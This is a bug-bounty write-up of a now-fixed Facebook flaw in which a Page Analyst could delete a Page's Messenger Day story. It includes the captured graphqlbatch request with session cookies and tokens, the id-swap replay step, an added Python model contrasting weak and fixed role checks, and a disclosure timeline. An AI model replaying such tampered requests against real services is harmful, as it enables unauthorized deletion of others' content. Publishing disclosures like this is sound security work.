Facebook's new 'Messenger Day' feature is a simple social storytelling device that makes it easy to create and share longer-form pieces within Messenger. Given the prevalence of such tools now, it makes more sense to label them 'social storytelling' features rather than 'Snapchat clones', but obviously that is where the inspiration comes from, as noted by Instagram chief Kevin Systrom on the launch of Instagram Stories: [Collected from Social Media Today]
They also rolled out the feature for Pages. After some testing, I saw that a Page's My Day can only be deleted by Page Admins and Editors; no other Page role can delete it. But this permission check was not enforced properly: I was able to delete a Page's My Day while holding only the Analyst role.
Steps to reproduce:
When a My Day is deleted, a request like the one below is sent:
POST /api/graphqlbatch/ HTTP/1.1
Host: www.facebook.com
Connection: close
Content-Length: 700
Origin: https://web.facebook.com/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://web.facebook.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pl;q=0.8
Cookie: datr=TWv7WRYNUZZUhAOZHB4ATXfJ; sb=TWv7WSiQ24I8FS-0XKqokiJi; dpr=2; locale=en_US; c_user=100007098091153; xs=11%3A95stLh7Ed8WD8A%3A2%3A1513273631%3A2736%3A5291; pl=n; js_ver=2906; fr=0ks7mYyw5WfL0CRxX.AWVInePzrxL8Nnv1KQRn6Ood1D4.BZ-2tL.48.Foy.0.0.BaNUOs.AWX2Er3L; wd=1280x726; presence=EDvF3EtimeF1513443752EuserFA21B07098091145A2EstateFDt3F_5b_5dEutc3F1513443720969G513443752453CEchFDp_5f1B07098091145F13CC; act=1513443771722%2F16
__user=100007098091153&__a=1&__dyn=7AgNe--aFoG649UrJxl0BCwKyaGey8jrWo8ovxGdwIhE98nwgU6C7WUC6UnG2OUuKewhA14DBwJKdx3Gqu58nxWcwJwkEkxa2m4o9Ef8oC-3S7WxR3Ey5ESrwipVk5ElwzwgUhx6WK64326Uao4afwNx-8xuazodopDy8Sez_G48-4o888ErUpUGq9wyQF8mDhA7EqAh49w&__req=28&__be=1&__pc=EXP1:home_page_pkg&__rev=3534449&fb_dtsg=AQHIKa44x8-X:AQGlWZ2DtMXp&jazoest=2658172737597525212056458858658171108879050681167788112&__spin_r=3534449&__spin_b=trunk&__spin_t=1513443694&queries={"o0":{"doc_id":"1340045906066120","query_params":{"input":{"client_mutation_id":"js_173","actor_id":"100007098091153","story_thread_ids":["188273688392089"]}}}}
To reproduce, replace the value of story_thread_ids with the story_thread_ids of the Page's My Day and replay the request from an account that holds only the Analyst role on that Page. The story_thread_ids value can be obtained by intercepting the call made while opening the Page's My Day.
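The following is an added example, not code from the original write-up or from Facebook, modelling the reproduction step (swapping story_thread_ids in the captured form body) and the server-side role check that the bug shows was missing. The role names, the Page and thread ids other than the ones quoted in the request above, the reduced request body, and the exact shape of the weak check are assumptions for illustration; the page only establishes that an Analyst could delete a Page's My Day while Admin and Editor were the intended roles.

```python
"""Model of the Page-role authorization a Messenger Day delete mutation must
enforce. Example code added by the editor, not Facebook's code: role names,
fixture data and the reduced request body are assumptions based on the
captured /api/graphqlbatch/ request above."""
import json
from urllib.parse import parse_qs, urlencode

# Page roles (assumed names; the write-up only names Admin, Editor and Analyst)
ADMIN, EDITOR, MODERATOR, ADVERTISER, ANALYST = (
    "admin", "editor", "moderator", "advertiser", "analyst")
# Per the write-up, only Admins and Editors may delete a Page's My Day.
ROLES_THAT_MAY_DELETE = {ADMIN, EDITOR}

# Constructed fixtures. The first thread id and the user id are the ones in the
# captured request; the Page and its My Day thread are invented for the example.
STORY_THREAD_OWNER = {
    "188273688392089": ("user", "100007098091153"),   # reporter's own My Day
    "900000000000001": ("page", "700000000000001"),   # a Page's My Day
}
PAGE_ROLES = {
    "700000000000001": {
        "100007098091153": ANALYST,   # reporter holds only Analyst on the Page
        "100000000000002": ADMIN,
    },
}

# Reduced form of the captured body: tokens shortened, only the fields the
# model reads are kept.
CAPTURED_BODY = (
    "__user=100007098091153&__a=1&fb_dtsg=REDACTED&"
    'queries={"o0":{"doc_id":"1340045906066120","query_params":{"input":'
    '{"client_mutation_id":"js_173","actor_id":"100007098091153",'
    '"story_thread_ids":["188273688392089"]}}}}'
)


def parse_delete_mutation(body):
    """Return (actor_id, story_thread_ids) from a graphqlbatch form body."""
    form = parse_qs(body)
    inp = json.loads(form["queries"][0])["o0"]["query_params"]["input"]
    return inp["actor_id"], list(inp["story_thread_ids"])


def swap_thread_ids(body, new_ids):
    """The reproduction step: rewrite story_thread_ids in a captured body.

    Everything else (tokens, actor_id) is kept as captured, which is what makes
    the replayed request a cheap authorization probe."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    queries = json.loads(form["queries"])
    queries["o0"]["query_params"]["input"]["story_thread_ids"] = list(new_ids)
    form["queries"] = json.dumps(queries, separators=(",", ":"))
    return urlencode(form)


def may_delete_vulnerable(actor_id, thread_id):
    """Hypothesised weak check: any role on the owning Page is accepted."""
    kind, owner = STORY_THREAD_OWNER[thread_id]
    if kind == "user":
        return owner == actor_id
    return actor_id in PAGE_ROLES.get(owner, {})


def may_delete_fixed(actor_id, thread_id):
    """Role-aware check: only Admins and Editors may delete a Page's My Day."""
    kind, owner = STORY_THREAD_OWNER[thread_id]
    if kind == "user":
        return owner == actor_id
    return PAGE_ROLES.get(owner, {}).get(actor_id) in ROLES_THAT_MAY_DELETE


def handle_delete(body, session_user, policy):
    """Server-side handler: {thread_id: 'deleted' | 'forbidden' | 'not_found'}.

    The identity checked is the session user (c_user cookie), never the
    client-supplied actor_id; a mismatching actor_id is rejected outright."""
    actor_id, thread_ids = parse_delete_mutation(body)
    if actor_id != session_user:
        return {t: "forbidden" for t in thread_ids}
    results = {}
    for t in thread_ids:
        if t not in STORY_THREAD_OWNER:
            results[t] = "not_found"
        else:
            results[t] = "deleted" if policy(session_user, t) else "forbidden"
    return results


if __name__ == "__main__":
    probe = swap_thread_ids(CAPTURED_BODY, ["900000000000001"])
    print("weak check :", handle_delete(probe, "100007098091153", may_delete_vulnerable))
    print("fixed check:", handle_delete(probe, "100007098091153", may_delete_fixed))
```

Run stand-alone, the weak policy reports the Page's My Day as deleted for the Analyst session while the fixed policy reports it as forbidden. The handler also binds the check to the session identity rather than the actor_id in the body, since that field is as attacker-controlled as story_thread_ids.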
Video PoC:
Timeline:
Saturday, December 16, 2017 at 3:32pm: Report sent.
Monday, January 15, 2018 at 11:58pm: Triaged.
Thursday, January 25, 2018 at 10:57pm: Fixed.
Wednesday, January 31, 2018 at 5:10pm: $500 bounty awarded.